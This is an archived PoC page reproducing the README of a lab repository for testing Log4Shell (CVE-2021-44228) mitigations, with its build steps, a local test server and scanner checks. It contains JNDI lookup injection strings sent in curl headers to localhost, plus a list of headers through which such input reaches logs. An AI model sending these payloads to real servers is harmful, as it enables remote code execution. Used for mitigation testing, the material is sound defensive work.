POC详情: 1317f321dd646577bac1645db8629d0cceab1d5d

来源
https://github.com/rgl/log4j-log4shell-playground
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations
介绍
# About

A playground for poking at the [critical log4j (aka Log4Shell) (CVE-2021-44228) vulnerability](https://en.wikipedia.org/wiki/Log4Shell) mitigations.

This particular problem lies within the [JndiLookup feature](https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup) and the log4j ability to interpret **ALL** the arguments of a logging call.

I would expect it to only interpret the format message (the first argument of a logging call), e.g., the `Hello {}` in `log.info("Hello {}", "${jndi:ldap://127.0.0.1:8081}")`, but it interprests all of them.

The mitigations will prevent log4j from triggering the `jndi` lookups, but they still allow other lookups like `${java:version}`.

**NB: Since log4j [2.16.0](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0) ([LOG4J2-3211](https://issues.apache.org/jira/browse/LOG4J2-3211); [diff](https://github.com/apache/logging-log4j2/compare/rel/2.15.0...rel/2.16.0)) the format message is no longer interpreted.**

This vulnerability can be triggered remotely when the target application logs any user supplied data, for example, from these common HTTP headers:

* `Accept`
* `Cookie`
* `Location`
* `Origin`
* `Referer`
* `User-Agent`
* `X-Api-Version`
* `X-Forwarded-For`
* `X-Forwarded-Host`
* `X-Requested-With`

# Play (Ubuntu 20.04)

Build:

```bash
sudo apt-get install -y openjdk-11-jdk-headless
wget https://archive.apache.org/dist/logging/log4j/2.10.0/apache-log4j-2.10.0-bin.tar.gz
wget https://archive.apache.org/dist/logging/log4j/2.16.0/apache-log4j-2.16.0-bin.tar.gz
tar xf apache-log4j-2.10.0-bin.tar.gz
tar xf apache-log4j-2.16.0-bin.tar.gz
javac -Werror -cp apache-log4j-2.10.0-bin/log4j-api-2.10.0.jar Server.java
```

Try a vulnerable log4j version:

```bash
java \
    -cp apache-log4j-2.10.0-bin/log4j-api-2.10.0.jar:apache-log4j-2.10.0-bin/log4j-core-2.10.0.jar:. \
    Server
curl -H 'X-Api-Version:${jndi:ldap://127.0.0.1:8081}' http://localhost:8080
curl -H 'X-Api-Version:${java:version}' http://localhost:8080
```

Try removing the `JndiLookup` class from the classpath mitigation:

```bash
cp apache-log4j-2.10.0-bin/log4j-core-2.10.0.jar log4j-core-2.10.0-without-jndi-lookup.jar
zip -q -d log4j-core-2.10.0-without-jndi-lookup.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
java \
    -cp apache-log4j-2.10.0-bin/log4j-api-2.10.0.jar:log4j-core-2.10.0-without-jndi-lookup.jar:. \
    Server
curl -H 'X-Api-Version:${jndi:ldap://127.0.0.1:8081}' http://localhost:8080
curl -H 'X-Api-Version:${java:version}' http://localhost:8080
```

Try the environment variable mitigation:

**NB** Since 2021-12-15 (circa log4j 2.16.0 / CVE-2021-45046 release date) this is no longer recommended.

```bash
LOG4J_FORMAT_MSG_NO_LOOKUPS=true \
    java \
    -cp apache-log4j-2.10.0-bin/log4j-api-2.10.0.jar:apache-log4j-2.10.0-bin/log4j-core-2.10.0.jar:. \
    Server
curl -H 'X-Api-Version:${jndi:ldap://127.0.0.1:8081}' http://localhost:8080
curl -H 'X-Api-Version:${java:version}' http://localhost:8080
```

Try a non-vulnerable log4j version:

```bash
java \
    -cp apache-log4j-2.16.0-bin/log4j-api-2.16.0.jar:apache-log4j-2.16.0-bin/log4j-core-2.16.0.jar:. \
    Server
curl -H 'X-Api-Version:${jndi:ldap://127.0.0.1:8081}' http://localhost:8080
curl -H 'X-Api-Version:${java:version}' http://localhost:8080
```

Try [grype](https://github.com/anchore/grype) to see whether it detects the vulnerability:

```bash
wget https://github.com/anchore/grype/releases/download/v0.27.2/grype_0.27.2_linux_amd64.tar.gz
tar xf grype_0.27.2_linux_amd64.tar.gz grype
./grype dir:.
```

Try [trivy](https://github.com/aquasecurity/trivy) to see whether it detects the vulnerability:

```bash
wget https://github.com/aquasecurity/trivy/releases/download/v0.21.2/trivy_0.21.2_Linux-64bit.tar.gz
tar xf trivy_0.21.2_Linux-64bit.tar.gz trivy
./trivy fs --security-checks vuln .
```

# References

* https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/
* https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
* https://logging.apache.org/log4j/2.x/security.html
* https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup
文件快照
 [4.0K]  /data/pocs/1317f321dd646577bac1645db8629d0cceab1d5d
├── [ 738]  log4j2.properties
├── [4.1K]  README.md
└── [2.8K]  Server.java

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。